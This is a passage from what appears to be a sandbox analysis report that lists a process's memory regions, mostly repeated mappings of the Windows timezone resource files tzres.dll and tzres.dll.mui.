id = 2939
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2940
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2941
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2942
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2943
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2945
start_va = 0xa90000
end_va = 0xa95fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a90000"
filename = ""
Region:
id = 2946
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2947
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2948
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2949
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2950
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2951
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2952
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2953
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2954
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2955
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2956
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2957
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2958
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2959
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2960
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2961
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2962
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2963
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2964
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2965
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2966
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2967
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2968
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2969
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2970
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2971
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2972
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2973
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2974
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2975
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2976
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2977
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2978
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2979
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2980
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2981
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2982
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2983
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2984
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2985
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2986
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2987
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2988
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2989
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2990
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2991
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2992
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2993
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2994
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2995
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2996
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2997
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2998
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2999
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3000
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3001
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3002
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3003
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3004
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3005
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3006
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3007
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3008
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3009
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3010
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3011
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3012
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3013
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3014
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3015
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3016
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3017
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3018
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3019
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3020
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3021
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3022
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3023
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3024
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3025
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3026
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3027
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3028
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3029
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3030
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3031
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3032
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3033
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3034
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3035
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3036
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3037
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3038
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3039
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3040
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3041
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3042
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3043
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3044
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3045
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3046
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3047
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3048
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3049
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3050
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3051
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3052
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3053
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3054
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3055
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3056
